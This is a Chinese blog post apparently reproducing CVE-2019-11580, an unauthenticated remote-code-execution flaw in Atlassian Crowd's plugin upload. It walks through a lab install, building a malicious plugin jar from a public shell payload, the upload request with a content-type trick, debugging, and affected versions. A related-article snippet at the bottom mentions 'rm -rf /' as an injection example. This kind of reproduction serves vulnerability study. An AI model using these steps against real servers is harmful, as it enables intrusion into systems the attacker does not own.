Atlassion Crowd未授权代码执行(CVE-2019-11580)

最新推荐文章于 2024-09-08 20:57:34 发布
最新推荐文章于 2024-09-08 20:57:34 发布
阅读量2.2k 收藏
点赞数
分类专栏: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/96285653
版权

Atlassian Crowd安装

参考:
https://blog.csdn.net/yieryi_/article/details/47724069
https://confluence.atlassian.com/crowd/running-the-setup-wizard-192479.html
https://confluence.atlassian.com/crowd/getting-started-with-crowd-197298051.html
下载地址:
https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip
或者
https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-2.11.0.zip
解压之后长这样:
在这里插入图片描述
需要先设置crowd的home地址,这里我设置为
解压

vi crowd-webapp/WEB-INF/classes/crowd-init.properties
# crowd.home=~/crowd-2.11.0

找到设置crowd.home文件的文件(文件名可能有变)
在这里插入图片描述
然后启动Crowd。

./start_crowd.sh

其实启动就是启动tomcat。

$ cat ./start_crowd.sh
#!/bin/sh

cd "`dirname "$0"`"
exec apache-tomcat/bin/startup.sh "$@"

执行启动脚本之后,会生成这些文件:
在这里插入图片描述
需要点击这个Set up Crowd来安装:
在这里插入图片描述
然后去这里:
https://my.atlassian.com/products/index
输入试用的license
然后成功安装。安装完成之后,会在crowd的home目录下安装一堆插件
在这里插入图片描述
尝试上传一下插件:
直接上传这些其中的插件,并没有成功。
在confluence的目录尝试上传一下这个插件,成功了
在这里插入图片描述
上传之后,在这个crowd的home目录下的cache目录生成了对应的 文件。
在这里插入图片描述
但是这个文件明显大于上传的文件。

# 在crowd的home目录生成的文件
➜  crowd-2.11.0 git:(master) ✗ ll caches/transformed-plugins/plugindev-4984681672219520916applinks-plugin-5.4.7_1563347908000.jar
-rw-r--r--  1 caiqiqi  staff    13M  7 17 15:18 caches/transformed-plugins/plugindev-4984681672219520916applinks-plugin-5.4.7_1563347908000.jar
# 被上传的文件
➜  atlassian-bundled-plugins ll applinks-plugin-5.4.7.jar
-rw-r--r--  1 caiqiqi  staff   5.6M  4  9 17:21 applinks-plugin-5.4.7.jar
尝试上传payload

使用https://github.com/lc/research/tree/master/CVE-2019-11580/atlassian-shell
的payload,

javac -cp apache-tomcat/lib/servlet-api.jar com/cdl/shell/Cdl.java
zip -r rce.jar atlassian-plugin.xml ./com

然而出现下面的情况:

HTTP Status 400 - Missing plugin file
...
The request sent by the client was syntactically incorrect.

在这里插入图片描述

调试

首先

ps aux|grep crowd

查找crowd的进程参数,然后搜索其中的某个特点,看在哪个配置文件的什么地方。

在这里插入图片描述
得知是在apache-tomcat/bin/setenv.sh文件中,
然后把这句加进去第二行:

JAVA_OPTS="-Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 ${JAVA_OPTS}"  # for debug

查看日志:

tail -f apache-tomcat/logs/catalina.out

分析

crowd的漏洞复现
https://hackerone.com/reports/632721

尝试找这个插件安装在什么地方。
先是在其启动目录(即下载下来直接解压的目录)中,只找到一个license文件
在这里插入图片描述
后来在其安装目录找到了这个插件。
在这里插入图片描述
在IDEA中打开这个安装目录。选择要调试的插件,右键=》Add as Library。
在这里插入图片描述

在这里插入图片描述
实际的payload:

POST /crowd/admin/uploadplugin.action HTTP/1.1
Host: cqq.com:8095
User-Agent: curl/7.54.0
Accept: */*
Content-Length: 5827015
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------28fd643fb0cfb3f4

如果直接GET访问这个url:/crowd/admin/uploadplugin.action,会提示400
在这里插入图片描述
使用curl或者抓包之后修改都行:
在这里插入图片描述
在这里插入图片描述
curl默认的上传文件的content-type为multipart/form-data,可以手动指定content-type为multipart/mixed。原理参考commons-fileupload的jar包调试。
在这里插入图片描述
感谢博哥指点!
源码在https://github.com/apache/commons-fileupload
另外由于在2.x版本中使用的struts2版本较低,存在struts2的OGNL表达式代码执行漏洞
在这里插入图片描述

影响版本

2.1.0 <= version < 3.0.5
3.1.0 <= version < 3.1.6
3.2.0 <= version < 3.2.8
3.3.0 <= version < 3.3.5
3.4.0 <= version < 3.4.4

参考

https://www.jianshu.com/p/be99b57a87cc
https://nvd.nist.gov/vuln/detail/CVE-2019-11580
https://www.corben.io/atlassian-crowd-rce/
https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html

caiqiiqi
关注
专栏目录
复现CVE-2019-11580Atlassian Crowd RCE)
记录并分享学习安全的知识点..
04-24 338
复现CVE-2019-11580Atlassian Crowd RCE)
Awesome-Crowd-Counting:很棒的人群计数
04-28
内容杂项消息[2020.04]已发布JHU-CROWD ++数据集。 [2021.04]释放RGBT-CC基准。征集论文[IET图像处理]有关以下方面的特刊:人群理解和分析[ ] [ ]挑战[ ] 人群计数。 ECCV研讨会。 截止日期: 2020.07.15 。 [ ]人群...
CVE-2019-11580 Atlassian Crowd RCE漏洞复现
墙角睡大觉的专栏
07-27 2132
0X1 漏洞概述 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。 近日,研究人员发现Atlassian Crowd...
授权访问:Atlassian Crowd授权访问漏洞
qq_68163788的博客
05-17 1139
Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。 Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。 攻击者利用该漏洞可在授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令
Atlassian Crowd 授权访问漏洞(详细版)
weixin_43061533的博客
12-15 2066
0x01 漏洞简述 Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品。Atlassian Crowd是一套基于Web的单点登录系统。该系统为用用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了了pdkinstall开发插件,使其存在安全漏漏洞洞。攻击者利
二十几种授权访问漏洞合集
2301_76786857的博客
01-13 1543
授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。攻击者发现并且利用此类漏洞的成本低,效果明显,影响巨大,因此此类漏洞必须高度重视起来。目前主要存在授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTP,Jenkins,MongoDB,Redis,ZooKeeper,ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等。
crowd-indic-transliteration-data:Xlit-Crowd
06-24
Xlit-Crowd:印地语-英语音译语料库 语料库包含印地语-英语的音译对。 这些对是通过众包获得的,要求工人将印地语单词音译为罗Maven字。 这些任务是在 Amazon Mechanical Turk 上完成的,总共产生了 14919 对。 ...
crowd------
04-19
在Linux操作系统中,"crowd"通常指的是Atlassian的Crowd服务器,这是一个强大的身份管理和访问控制解决方案。它允许组织集中管理用户账户、密码策略以及权限分配,适用于多种应用程序和服务。在Linux环境中部署和...
matlab分时代码-NWPU-Crowd-Sample-Code:大规模人群计数数据集的示例代码NWPU-Crowd
05-21
matlab分时代码NWPU人群示例代码 此仓库是以下国家/地区的正式实现: NWPU-Crowd:人群计数的大规模基准。 该代码是基于开发的。 与原始的C ^ 3框架相比, 利用了python3.x的新功能; 密度图由转换层在线生成,以...
Render-Crowd-Of-Animated-Characters-master.zip
06-11
利用GPU实现大规模动画角色的渲染。 anim map for vertex shader to modify the vertex position of the mesh at runtime. use gpu instancing to reduce draw call.
django-crowd-auth:适用于Django应用程序的Atlassian Crowd SSO集成
05-11
django-crowd-auth 该软件包包括一个身份验证后端和一个身份验证中间件,以将Django的身份验证系统与Atlassian Crowd集成在一起。 当针对Crowd对用户进行身份验证时,将在Django中检索其嵌套组并对其进行镜像。 ...
confapi-crowd-plugin:ConfAPI for Crowd提供了用于自动配置的REST API
04-01
由于ConfAPI for Crowd 是开源项目,可以从压缩包文件"confapi-crowd-plugin-master"中获取源代码。开发者可以根据自身需求进行定制,或者直接部署到Crowd服务器。安装过程通常包括下载插件、将插件上传至Crowd...
人流疏散模型matlab代码-Crowd-Behavior:人群行为
06-12
人流疏散模型matlab代码人群行为 使用个体代理模型对逃跑机制进行建模 概括 以下报告旨在分析几种简单的人群行为模型,以探索一群人在特定条件下如何撤离建筑物。 模拟表明,(1) React时间的较大差异可以抵消较高的...
crowd-simulation:伊斯坦布尔街道上的人群模拟
05-29
伊斯坦布尔街道上的人群模拟 在 TEDU istasyon 技术讲座上发表。 地图基于在 QGIS 上编辑和裁剪的 openstreetmap 数据。 我使用 img2txt 模块将最终地图转换为 ascii 地图。 您可以在maps目录中找到 ascii 地图来...
一、Crowd的安装
weixin_38621072的博客
06-06 1259
一、Crowd安装前的系统规划 参考这里面的系统规划 二、安装数据库 参考Centos7上安装及配置MySQL5.7.20 三、在Linux-Centos上安装Crowd 1、安装JDK 如果有其它版本JDK,请先卸载 ​          命令:rpm -qa | grep jdk ​       &nbsp
FireEye 红队失窃工具大揭秘之:分析复现 Atlassian RCE (CVE-2019-11580)
smellycat000的专栏
12-10 544
聚焦源代码安全,网罗国内外最新资讯!前言最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗。虽然目前尚不清楚这些红队...
实习Day8
最新发布
gwy13290049193的博客
09-08 972
rm -rf / 的命令,系统将会先执行正常的ping命令,随后删除所有文件,这就是典型的命令注入导致的RCE。在Weblogic的某些组件或功能中,如果对用户输入的内容没有进行充分的验证和过滤,就可能导致攻击者通过构造特殊的请求来读取服务器上的任意文件。apache druid RCE:Druid是一个常用的数据库连接池组件,在某些版本中,由于对外部输入进行充分验证和过滤,攻击者可以通过构造恶意请求,利用Druid的某些功能执行任意代码,从而控制服务器。这两个文件均位于base_domain下,名为。
Atlassian 系列软件安装(Crowd、jira、confluence、bitbucket、bamboo)
justlpf的专栏
08-02 2607
名称简介Crowd易于使用、管理和集成的单点登录和身份管理工具。除了支持 Atlassian 系列软件,也支持 SonarQube,Jenkins,Nexus 等JIRA使用敏捷团队的首选软件开发工具,规划、追踪和发布世界一流的软件。Confluence可减少东找西找所花的时间,将更多的时间用在完成工作上。可在同一位置整理工作、创建文档并讨论一切内容。Bitbucket通过内嵌的评论和拉取请求协作编写代码。整个团队管理并共享 Git 代码库以构建和交付软件。Bamboo。..................
cve-2020-5398 怎么修复
05-30
CVE-2020-5398是Atlassian Crowd中的一项安全漏洞,攻击者可以利用此漏洞来执行授权代码。为了修复此漏洞,您需要执行以下步骤: 1. 下载并安装Crowd的最新版本 2. 如果您正在使用Crowd SSO,您需要更新所有连接到Crowd的应用程序 3. 如果您使用了Crowd的嵌入式API,您需要更新所有使用该API的应用程序 4. 您还应该更新所有连接到Crowd的第三方插件 请注意,在执行这些步骤之前,请务必备份您的Crowd数据以防万一。此外,我们强烈建议您在更新Crowd之前测试所有更改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值